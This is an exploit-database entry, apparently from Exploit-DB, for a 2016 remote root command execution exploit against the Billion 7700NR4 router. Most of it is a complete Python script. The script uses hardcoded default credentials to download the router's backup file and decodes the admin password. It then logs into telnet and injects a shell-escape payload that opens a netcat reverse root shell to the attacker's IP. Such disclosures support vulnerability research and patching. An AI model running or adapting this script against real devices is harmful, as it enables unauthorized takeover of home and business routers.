Billion Router 7700NR4 Remote Root Command Execution

vendor:

Router 7700NR4

by:

R-73eN

9,8

CVSS

HIGH

Remote Root Command Execution

287

CWE

Product Name: Router 7700NR4

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Billion Router 7700NR4

2016

Billion Router 7700NR4 Remote Root Command Execution

This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users. The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password. Using that password we can login to telnet server and use a shell escape to get a reverse root connection.

Mitigation:

The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables.

Source

Exploit-DB raw data:

# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4 
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these 
# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. 
#

import requests
import base64
import socket
import time

host = ""
def_user = "user"
def_pass = "user"
reverse_ip = ""
#Banner
banner = ""
banner +="  ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner


# limited shell escape
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip  + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'

def execute_payload(password):
	print "[+] Please run nc -lvp 1337 and then press any key [+]"
	raw_input()
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,23))
	s.recv(1024)
	s.send("admin\r")
	a= s.recv(1024)
	time.sleep(1)
	s.send(password +"\r")
	time.sleep(1)
	s.recv(1024)
	s.send(evil + "\r")
	time.sleep(1)
	print "[+] If everything worked you should get a reverse shell [+]"
	print "[+] Warning pressing any key will close the SHELL [+]"
	raw_input()




r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
if(r.status_code == 200):
	print "[+] Seems the exploit worked [+]"
	print "[+] Dumping data . . . [+]"
	temp = r.text
	admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0]
#	print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
	execute_payload(str(base64.b64decode(admin_pass)))
else:
	print "[-] Exploit Failed [-]"
print "\n[+] https://www.infogen.al/ [+]\n\n"